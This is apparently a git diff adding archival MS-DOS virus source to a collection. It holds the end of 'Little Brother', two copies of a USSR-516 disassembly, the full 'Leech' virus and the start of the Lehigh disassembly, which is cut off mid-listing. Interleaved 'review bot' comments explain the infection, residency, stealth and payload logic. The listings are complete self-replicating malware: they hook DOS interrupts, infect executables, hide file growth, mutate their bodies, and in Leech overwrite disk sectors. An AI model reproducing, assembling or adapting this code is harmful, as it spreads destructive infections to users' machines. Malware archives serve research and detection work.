ptr [nameptr] ;delete the file + mov ah,41h + int 21 + +return1: pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext + +return: ret + +do_com: call findfirst ;is the file a virus? + cmp word ptr cs:[DTA+1Ah],FILELEN + jne return + mov si,offset EXE_txt ;does the EXE-variant exist? 
+ call change_ext + call findfirst + jnc return + mov si,offset COM_txt ;change extension to COM + jmp short change_ext + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + + +;**************************************************************************** +;* change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + +;**************************************************************************** +;* search begin of extension +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,'.' + repnz scasb + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + + db 'Little Brother',0 + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leap.asm b/MSDOS/Virus.MSDOS.Unknown.leap.asm new file mode 100644 index 00000000..70a16bf9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leap.asm 
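Review bot: The file has no header beyond the title line, so the three facts an analyst needs first are only recoverable by tracing the code: this is a companion infector (on AX=4B00h for a .EXE it creates a same-named .COM of FILELEN bytes with AH=5Bh create-new, and on a later exec of that .COM the resident `do_com` path rewrites the caller's DS:DX name buffer in place to .EXE so the original host runs instead), it installs by copying itself to the fixed address 0044h:0100h and pointing the INT 21h vector there, and its residency check is AX=0DEDEh answered with AH=41h/AL=VERSION. I'd add that under the title, e.g. `;* Companion infector: creates NAME.COM beside NAME.EXE on exec (AH=5Bh); resident copy at 0044h:0100h` / `;* Install check: AX=0DEDEh -> AH=41h, AL=VERSION; the .COM is never run, the hook re-targets the exec to NAME.EXE`. A defect worth flagging rather than fixing, since this is archival malware: `searchpoint` runs `repnz scasb` for '.' with CX=0FFxxh and never tests ZF, so a name without a dot leaves DI past the end of the string and `change_ext` overwrites whatever follows. Also note that the bare `int 21` / `mov cl,27h`-style operands depend on the `.RADIX 16` directive near the top, which is easy to miss when reading the handler in isolation.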
@@ -0,0 +1,280 @@ + +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +;Disassembled by Dark Angel of PHALCON/SKISM +;for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +;This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ;Actually it's int 21h + ;entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ;BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ;DI -> orig4 + movsw ;restore original + movsw ;4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ;int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ;Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ;Find marker bytes + jne findmarker ;to the entry point + mov [bp+4],di ;and move to + mov [bp+6],ds ;int30store + mov ax,5252h ;Get list of lists + int 21h ;and also ID check + + add bx,12h ;Already installed? + jz quitvir ;then exit + push bx + mov ah,30h ;Get DOS version + int 21h + + pop bx ;bx = 12, ptr to 1st + ;disk buffer + cmp al,3 + je handlebuffer ;if DOS 3 + ja handleDBHCH ;if > DOS 3 + inc bx ;DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ;Get seg:off of buffer + inc si + pop di + pop es ;ES:DI->seg:off buff + mov ax,[bx] ;ptr to next buffer + cmp ax,0FFFFh ;least recently used? 
+ jne handlebuffer ;if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ;Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ;ptr to disk buffer + lodsw ;info + lodsw ;seg of disk buffer + ;hash chain head array + inc ax ;second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ;EMS page, -1 if not + ;in EMS + xchg ax,di ;save in di + lodsw ;ptr to least recently + ;used buffer + mov [di+2],ax ;change disk buffer + ;backward offset to + ;least recently used + xchg ax,di ;restore EMS page + mov [di],ax ;set to least recently +movetobuffer: ;used + mov di,bx + push ds + pop es ;ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ;Copy from start + rep movsw + mov ds,cx ;DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ;New interrupt handler + mov word ptr ds:[4*21h+2],es ;at int21 +quitvir: + push cs ;CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ;set up stack for + push si ;the return to the + retn ;original program +int24: + mov al,3 ;Ignore all errors + iret +tickstore db 3 ;Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ;CP/M style call entry + call dword ptr cs:[int30store-start] + retn ;point of int 21h + +int21DSDX: ;For int 21h calls + push ds ;with + lds dx,dword ptr [bp+2] ;DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ;Execute + je Execute + cmp ax,5252h ;ID check + je CheckID + cmp ah,30h ;DOS Version + je DosVersion +callorig21: ;Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ;Why????? 
;DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ;Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ;# 2-17 + pop ax + pop es + iret +CheckID: ;ID Check + mov bx,0FFEEh ;FFEEh = -12h + iret +Execute: ;Execute + push ax ;Save registers + push cx + push es + push bx + push ds ;DS:DX -> filename + push dx ;save it on stack + push bp + mov bp,sp ;Set up stack frame + sub sp,0Ah ;Temporary variables + ;[bp-A] = attributes + ;[bp-8] = int 24 off + ;[bp-6] = int 24 seg + ;[bp-4] = file time + ;[bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ;Turn off ^C check + xor dl,dl ;(never turn it back + call int21 ; on. Bug???) + mov ax,3524h ;Get int 24h + call int21 ;(Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ;Set to new one + call int21 + mov ax,4300h ;Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ;Restore crit error + lds dx,dword ptr [bp-8] ;handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ;Call orig handler +continue: + mov [bp-0Ah],cx ;Save attributes + test cl,1 ;Check if r/o???? 
+ jz noclearattr + xor cx,cx + mov ax,4301h ;Clear attributes + call int21DSDX ;Filename in DS:DX + jc doneinfect ;Quit on error +noclearattr: + mov ax,3D02h ;Open read/write + call int21DSDX ;Filename in DS:DX + jc doneinfect ;Exit if error + mov bx,ax + mov ax,5700h ;Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ;Read 4 bytes to + call int21 ;buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h + jne quitinf ;Otherwise, quit + mov dx,word ptr ds:[buffer+1-start];dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ;go there + call int21 + mov ds:[buffer-start],ax ;new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ;Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ;0E9h means we might + jne infect ;already be there + mov ax,ds:[orig4+2-start] ;continue checking + add al,dh ;to see if we really + sub al,ah ;are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ;Go to EOF + call int21 + mov ds:[buffer+2-start],ax ;save filesize + mov cx,204h + mov ah,40h ;Write virus + call int21 + jc quitinf ;Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ;AX->jmp offset + mov word ptr ds:[buffer+1-start],ax;Set up buffer + mov byte ptr ds:[buffer-start],0E9h;code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ;Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ;Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ;Restore date/time + call int21 + mov ah,3Eh ;Close file + call int21 + mov cx,[bp-0Ah] ;Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ;Return +ussr516 ends + end stub + + diff --git a/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm b/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm new file mode 100644 index 00000000..8638e789 --- /dev/null 
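Review bot: Two inline comments in the `DosVersion` handler contradict the code: `and al,7` is `; MOD 8` (result 0-7), not `; MOD 15`, and after the two `inc ax` the stored countdown is 2-9, not `; # 2-17`, so anyone keying the trigger interval off the comments gets the wrong period. The `; Bug????` on `lds di,dword ptr ds:[30h*4+1]` also reads as a mistake, but the `+1` presumably skips the 0EAh opcode of the far JMP that DOS keeps at 0000:00C0h for CP/M-style calls, which is why the result is stored as `int30store` and used as the INT 21h entry in `call dword ptr cs:[int30store-start]`; I'd replace it with `; skip 0EAh of JMP FAR at 0:00C0h -> DOS entry (confirm on DOS 2/3)`. The listing has no header beyond the disassembler credit, and it should state what the code shows: resident infector of files whose first byte is 0E9h, 204h bytes written at EOF and a fresh 4-byte JMP patched at the original JMP's target, installed into a DOS disk buffer rather than allocated memory with INT 21h pointed at offset 0BCh inside it, install check AX=5252h -> BX=0FFEEh. Finally, when the countdown reaches zero the `DosVersion` path ends in `iret` without ever calling DOS, so the caller gets its own AX back instead of a version; that is the behaviour hidden behind `; Why?????` and deserves a plain comment such as `; every 2-9th AH=30h call returns without reaching DOS`.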
+++ b/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm 
@@ -0,0 +1,278 @@ + +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +; Disassembled by Dark Angel of PHALCON/SKISM +; for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +; This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ; Actually it's int 21h + ; entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ; BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ; DI -> orig4 + movsw ; restore original + movsw ; 4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ; int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ; Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ; Find marker bytes + jne findmarker ; to the entry point + mov [bp+4],di ; and move to + mov [bp+6],ds ; int30store + mov ax,5252h ; Get list of lists + int 21h ; and also ID check + + add bx,12h ; Already installed? + jz quitvir ; then exit + push bx + mov ah,30h ; Get DOS version + int 21h + + pop bx ; bx = 12, ptr to 1st + ; disk buffer + cmp al,3 + je handlebuffer ; if DOS 3 + ja handleDBHCH ; if > DOS 3 + inc bx ; DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ; Get seg:off of buffer + inc si + pop di + pop es ; ES:DI->seg:off buff + mov ax,[bx] ; ptr to next buffer + cmp ax,0FFFFh ; least recently used? 
+ jne handlebuffer ; if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ; Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ; ptr to disk buffer + lodsw ; info + lodsw ; seg of disk buffer + ; hash chain head array + inc ax ; second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ; EMS page, -1 if not + ; in EMS + xchg ax,di ; save in di + lodsw ; ptr to least recently + ; used buffer + mov [di+2],ax ; change disk buffer + ; backward offset to + ; least recently used + xchg ax,di ; restore EMS page + mov [di],ax ; set to least recently +movetobuffer: ; used + mov di,bx + push ds + pop es ; ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ; Copy from start + rep movsw + mov ds,cx ; DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ; New interrupt handler + mov word ptr ds:[4*21h+2],es ; at int21 +quitvir: + push cs ; CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ; set up stack for + push si ; the return to the + retn ; original program +int24: + mov al,3 ; Ignore all errors + iret +tickstore db 3 ; Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ; CP/M style call entry + call dword ptr cs:[int30store-start] + retn ; point of int 21h + +int21DSDX: ; For int 21h calls + push ds ; with + lds dx,dword ptr [bp+2] ; DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ; Execute + je Execute + cmp ax,5252h ; ID check + je CheckID + cmp ah,30h ; DOS Version + je DosVersion +callorig21: ; Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ; Why????? 
; DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ; Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ; # 2-17 + pop ax + pop es + iret +CheckID: ; ID Check + mov bx,0FFEEh ; FFEEh = -12h + iret +Execute: ; Execute + push ax ; Save registers + push cx + push es + push bx + push ds ; DS:DX -> filename + push dx ; save it on stack + push bp + mov bp,sp ; Set up stack frame + sub sp,0Ah ; Temporary variables + ; [bp-A] = attributes + ; [bp-8] = int 24 off + ; [bp-6] = int 24 seg + ; [bp-4] = file time + ; [bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ; Turn off ^C check + xor dl,dl ; (never turn it back + call int21 ; on. Bug???) + mov ax,3524h ; Get int 24h + call int21 ; (Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ; Set to new one + call int21 + mov ax,4300h ; Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ; Restore crit error + lds dx,dword ptr [bp-8] ; handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ; Call orig handler +continue: + mov [bp-0Ah],cx ; Save attributes + test cl,1 ; Check if r/o???? 
+ jz noclearattr + xor cx,cx + mov ax,4301h ; Clear attributes + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Quit on error +noclearattr: + mov ax,3D02h ; Open read/write + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Exit if error + mov bx,ax + mov ax,5700h ; Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes to + call int21 ; buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h + jne quitinf ; Otherwise, quit + mov dx,word ptr ds:[buffer+1-start]; dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ; go there + call int21 + mov ds:[buffer-start],ax ; new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ; 0E9h means we might + jne infect ; already be there + mov ax,ds:[orig4+2-start] ; continue checking + add al,dh ; to see if we really + sub al,ah ; are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ; Go to EOF + call int21 + mov ds:[buffer+2-start],ax ; save filesize + mov cx,204h + mov ah,40h ; Write virus + call int21 + jc quitinf ; Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ; AX->jmp offset + mov word ptr ds:[buffer+1-start],ax; Set up buffer + mov byte ptr ds:[buffer-start],0E9h; code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ; Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ; Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ; Restore date/time + call int21 + mov ah,3Eh ; Close file + call int21 + mov cx,[bp-0Ah] ; Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ; Return +ussr516 ends + end stub diff --git a/MSDOS/Virus.MSDOS.Unknown.leech.asm b/MSDOS/Virus.MSDOS.Unknown.leech.asm new file mode 100644 index 00000000..fafaeac8 --- /dev/null 
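Review bot: This file is the same code as Virus.MSDOS.Unknown.leap.asm in the same commit, differing only in the spacing after the `;` comment markers, and it carries over the same misleading comments (`and al,7 ; MOD 15` should read `; MOD 8`, `; # 2-17` should read `; 2-9`, and `; Bug????` on the `ds:[30h*4+1]` load presumably just skips the 0EAh opcode of the far JMP at 0000:00C0h). Either one copy should be dropped or each should get a one-line cross-reference at the top, e.g. `; Duplicate of leap.asm (same Dark Angel / 40Hex #7 disassembly); comment spacing only`, so the two are not catalogued as distinct variants.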
+++ b/MSDOS/Virus.MSDOS.Unknown.leech.asm 
@@ -0,0 +1,498 @@ +code segment + assume cs:code + org 100h + +start: + jmp begin + + org 200h +begin: + jmp short beg + +FileSize dw 0E00h; 02h +int21vec dd 0 ; 04h +oldint13 dd 0 ; 08h +oldint24 dd 0 ; 0Ch +Date dw 0 ; 10h +Time dw 0 ; 12h + db 1 ; 14h +version dw 0 ; 15h - mutation status + +beg: + call codenext +codenext: + pop si +mutation1: + cli + push ds + pop es + mov bp,sp + mov sp,si + add sp,3FEh-(offset codenext-offset begin) +mutation2: + mov cx,ss + mov ax,cs + mov ss,ax + pop bx + dec sp + dec sp + add si,offset mybeg-offset codenext +codeloop: + pop ax + xor al,bh + push ax + dec sp + cmp sp,si + jnc codeloop +mybeg: + mov ax,es + dec ax + mov ds,ax + add word ptr ds:[3],-082h + mov bx,ds:[3] + mov byte ptr ds:[0],5ah + inc ax + inc bx + add bx,ax + mov es,bx + mov ss,cx + add si,offset begin-offset mybeg + mov bx,ds + mov ds,ax + mov sp,bp + push si + xor di,di + mov cx,400h + cld + rep movsb + pop si + push bx + mov bx,offset inblock-offset begin + push es + push bx + retf +inblock: + mov es,ax + mov ax,cs:[2] ; File Size + add ax,100h + mov di,si + mov si,ax + mov cx,400h + rep movsb + pop es + xor ax,ax + mov ds,ax + sti + cmp word ptr ds:[21h*4],offset int21-offset begin + jne count + sub word ptr es:[3],-082h + test byte ptr ds:[46ch],11100111b + jnz efect1 + push cs + pop ds + mov si,offset msg-offset begin +efect2: + lodsb + or al,0 + jz efect3 + mov ah,0eh + int 10h + jmp short efect2 +efect3: + mov ah,32h + xor dl,dl + int 21h + jc efect1 + call setaddr + call setint + mov dx,ds:[bx+10h] + mov ah,19h + int 21h + mov cx,2 + int 26h + pop bx + call setint +efect1: + jmp quit +count: + add word ptr es:[12h],-082h + mov bx,ds:[46ch] + push ds + push cs + pop ds + push cs + pop es + mov byte ptr ds:[14h],1 + and bh,80h + mov ds:[4ffh],bh + test bl,00000001b + jnz mut1 + mov si,offset mutation1-offset begin + add si,ds:[15h] + lodsb + xchg al,ds:[si] + mov ds:[si-1],al +mut1: + test bl,00000010b + jnz mut2 + mov si,offset mutation2-offset begin 
+ add si,ds:[15h] + lodsw + xchg ax,ds:[si] + mov ds:[si-2],ax +mut2: + test bl,00000100b + jnz mut3 + mov si,offset codeloop-offset begin + mov al,2 + xor byte ptr ds:[si],al + xor byte ptr ds:[si+2],al + xor byte ptr ds:[si+3],al +mut3: + test bl,00001000b + jnz mut4 + mov si,offset codenext-offset begin + mov di,400h + mov cx,offset codeloop-offset codenext-2 + push si + push di + lodsb + cmp al,5eh + je jmp1 + inc si +jmp1: + push cx + rep movsb + pop cx + pop si + pop di + cmp al,5eh + je jmp2 + mov al,5Eh + stosb + rep movsb + mov al,90h + stosb + xor ax,ax + jmp short jmp3 +jmp2: + mov ax,0C68Fh + stosw + rep movsb + mov ax,1 +jmp3: + mov cs:[15h],ax +mut4: + mov ah,30h + int 21h + cmp ax,1e03h + jne nodos33 + mov ah,34h + int 21h + mov bx,1460h + jmp short dos33 +nodos33: + mov ax,3521h + int 21h +dos33: + mov ds:[4],bx + mov ds:[6],es + mov si,21h*4 + pop ds + push si + push cs + pop es + mov di,offset intend-offset begin+1 + movsw + movsw + pop di + push ds + pop es + mov ax,offset int21-offset begin + stosw + mov ax,cs + stosw + mov di,offset mybeg-offset begin + mov al,cs:[3ffh] +coderloop: + xor cs:[di],al + inc di + cmp di,offset coderloop-offset begin + jc coderloop +quit: + mov ah,62h + int 21h + push bx + mov ds,bx + mov es,bx + mov ax,100h + push ax + retf +;------------------------------------------------------------------------------ +infect: + push si + push ds + push es + push di + cld + push cs + pop ds + xor dx,dx + call movefp + mov dx,400h + mov ah,3fh + mov cx,3 + call Dos + jc infect4 + xor di,di + mov ax,word ptr ds:[400h] + mov cx,ds:[0] + cmp cx,ax + je infect8 + cmp al,0EBH ; near jmp + jne infect1 + mov al,ah + xor ah,ah + add ax,2 + mov di,ax +infect1: + cmp al,0E9h ; far jmp + jne infect2 + mov ax,ds:[401h] + add ax,3 + mov di,ax + xor ax,ax +infect2: + cmp ax,'MZ' + je infect4 + cmp ax,'ZM' + jne infect3 +infect4: + stc +infect8: + jmp infectquit +infect3: + mov dx,di + push cx + call movefp + mov dx,400h + mov ah,3fh + mov cx,dx 
+ call Dos + pop cx + jc infect4 + cmp ds:[400h],cx + je infect8 + mov ax,di + sub ah,-4 + cmp ax,ds:[2] + jnc infect4 + mov dx,ds:[2] + call movefp + mov dx,400h + mov cx,dx + mov ah,40h + call Dos +infect6: + jc infectquit + mov dx,di + call movefp + push cs + pop es + mov di,400h + push di + push di + xor si,si + mov cx,di + rep movsb + mov si,400h+offset coderloop-offset begin + mov al,ds:[7ffh] +infect5: + xor ds:[si],al + inc si + cmp si,07ffh + jc infect5 + pop cx + pop dx + mov ah,40h + call Dos +infectquit: + pop di + pop es + pop ds + pop si + ret +int21: + cmp ax,4b00h + je exec + cmp ah,3eh + je close + cmp ah,11h + je dir + cmp ah,12h + je dir +intend: + db 0eah,0,0,0,0 + +dir: + push si + mov si,offset intend-offset begin+1 + pushf + call dword ptr cs:[si] + pop si + push ax + push bx + push es + mov ah,2fh + call dos + cmp byte ptr es:[bx],0ffh + jne dir2 + add bx,7 +dir2: + mov ax,es:[bx+17h] + and ax,1fh + cmp ax,1eh + jne dir1 + mov ax,es:[bx+1dh] + cmp ax,0801h + jc dir1 + sub ax,400h + mov es:[bx+1dh],ax +dir1: + pop es + pop bx + pop ax + iret +int24: + mov al,3 + iret +Dos: + pushf + call dword ptr cs:[4] + ret +moveFP: + xor cx,cx + mov ax,4200h + call Dos + ret +exec: + push ax + push bx + mov byte ptr cs:[14h],0 + mov ax,3d00h + call dos + mov bx,ax + mov ah,3eh + int 21h + pop bx + pop ax +intendjmp: + jmp short intend +close: + or byte ptr cs:[14h],0 + jnz intendjmp + push cx + push dx + push di + push es + push ax + push bx + call setaddr + call setint + mov ax,1220h + int 2fh + jc closequit + mov ax,1216h + mov bl,es:[di] + xor bh,bh + int 2fh + mov ax,es:[di+11h] + mov cs:[2],ax + mov ax,es:[di+0dh] + and al,0f8h + mov cs:[12h],ax + mov ax,es:[di+0fh] + mov cs:[10h],ax + cmp word ptr es:[di+29h],'MO' + jne closequit + cmp byte ptr es:[di+28h],'C' + jne closequit + cmp cs:[2],0FA00h + jnc closequit + mov al,20h + xchg al,es:[di+4] + mov ah,2 + xchg es:[di+2],ah + pop bx + push bx + push ax + call infect + pop ax + mov es:[di+4],al + mov 
es:[di+2],ah + mov cx,cs:[12h] + jc close1 + or cl,1fh + and cl,0feh +close1: + mov dx,cs:[10h] + mov ax,5701h + call Dos +closequit: + pop bx + pop ax + pop es + pop di + pop dx + pop cx + call dos + call setint + retf 02 +setaddr: + mov ah,13h + int 2fh + mov cs:[8d],bx + mov cs:[10d],es + int 2fh + mov cs:[12d],offset int24-offset begin + mov cs:[14d],cs + ret +setint: + push ax + push si + push ds + pushf + cli + cld + xor ax,ax + mov ds,ax + mov si,13h*4 + lodsw + xchg ax,cs:[8] + mov ds:[si-2],ax + lodsw + xchg ax,cs:[10d] + mov ds:[si-2],ax + mov si,24h*4 + lodsw + xchg ax,cs:[12d] + mov ds:[si-2],ax + lodsw + xchg ax,cs:[14d] + mov ds:[si-2],ax + popf + pop ds + pop si + pop ax + ret +msg: + db 'The leech live ...',0 + db 'April 1991 The Topler.',0 + + org 0F00h + + int 20h + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lehigh.asm b/MSDOS/Virus.MSDOS.Unknown.lehigh.asm new file mode 100644 index 00000000..5d3e42a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lehigh.asm 
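Review bot: The listing has no header at all, and its destructive payload is buried in the install code after the `cmp word ptr ds:[21h*4],offset int21-offset begin` residency test: when the low byte of the BIOS tick count at 0000:046Ch has bits 0,1,2,5,6,7 clear (`test byte ptr ds:[46ch],11100111b`), the code prints 'The leech live ...' via INT 10h, fetches the current drive's DPB with AH=32h, and issues `int 26h` with CX=2 and DX taken from DPB offset 10h, presumably the first root-directory sector in the DOS 3 DPB layout, so this is a two-sector overwrite, not just a message (confirm the DPB offset against the DOS version targeted). I'd add a header naming the strain from the embedded strings ('The leech live ...', 'April 1991 The Topler.') and summarising what the code shows: resident COM infector of 400h bytes, hooks INT 21h AX=4B00h / AH=3Eh / AH=11h / AH=12h, infects at file close (armed by the flag byte at CS:14h that AX=4B00h clears), marks infected files with a time-stamp seconds field of 1Eh (`or cl,1fh` / `and cl,0feh`), and hides the growth from FCB directory searches (`dir:` subtracts 400h from the size word at ES:[BX+1Dh] when the marker matches). The `mut1`-`mut4` patches to `mutation1`, `mutation2`, `codeloop` and `codenext`, each driven by a bit of the tick count, plus the `coderloop` XOR keyed by `cs:[3ffh]`, mean the decryptor and body vary between generations, which should be stated so nobody expects a fixed entry-point signature. The `int 26h` line and the `coderloop` XOR are the two I would comment first, e.g. `; PAYLOAD: overwrite 2 sectors at DPB+10h (root dir start?) on current drive`.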
@@ -0,0 +1,315 @@ + page 65,132 + title The 'Lehigh' Virus +; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +; º British Computer Virus Research Centre º +; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º +; º Telephone: Domestic 0273-26105, International +44-273-26105 º +; º º +; º The 'Lehigh' Virus º +; º Disassembled by Joe Hirst, July 1989 º +; º  º +; º Copyright (c) Joe Hirst 1989. º +; º º +; º This listing is only to be made available to virus researchers º +; º or software writers on a need-to-know basis. º +; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:CODE + + ; Interrupt 21H routine + +BP0010: PUSH AX + PUSH BX + CMP AH,4BH ; Load function? + JE BP0020 ; Branch if yes + CMP AH,4EH ; Find file file? + JE BP0020 ; Branch if yes + JMP BP0170 ; Pass interrupt on + + ; Load or find file function + +BP0020: MOV BX,DX ; Get pathname pointer + CMP BYTE PTR [BX+1],':' ; Is a disk specified? + JNE BP0030 ; Branch if not + MOV AL,[BX] ; Get disk letter + JMP BP0040 + + ; Is there a COMMAND.COM on disk? + +BP0030: MOV AH,19H ; Get current disk function + INT 44H ; DOS service (diverted INT 21H) + ADD AL,'a' ; Convert to letter +BP0040: PUSH DS + PUSH CX + PUSH DX + PUSH DI + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV BX,OFFSET PATHNM ; Address pathname + MOV [BX],AL ; Store disk letter in pathname + MOV DX,BX ; Move pathname address + MOV AX,3D02H ; Open handle (R/W) function + INT 44H ; DOS service (diverted INT 21H) + JNB BP0050 ; Branch if no error + JMP BP0160 ; Restore registers and terminate + + ; Is COMMAND.COM infected? 
+ +BP0050: MOV BX,AX ; Move file handle + MOV AX,4202H ; Move file pointer function (EOF) + XOR CX,CX ; \ No offset + MOV DX,CX ; / + INT 44H ; DOS service (diverted INT 21H) + MOV DX,AX ; Copy file length + MOV FILELN,AX ; Save file length + SUB DX,2 ; Address last word of file + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV DX,OFFSET BUFFER ; Address read buffer + MOV CX,2 ; Length to read + MOV AH,3FH ; Read handle function + INT 44H ; DOS service (diverted INT 21H) + CMP WORD PTR BUFFER,65A9H ; Is file infected? + JNE BP0060 ; Branch if not + JMP BP0080 + + ; Infect COMMAND.COM + +BP0060: XOR DX,DX ; \ No offset + MOV CX,DX ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV CX,3 ; Length to read + MOV DX,OFFSET BUFFER ; Address read buffer + MOV DI,DX ; Copy address + MOV AH,3FH ; Read handle function + INT 44H ; DOS service (diverted INT 21H) + MOV AX,[DI+1] 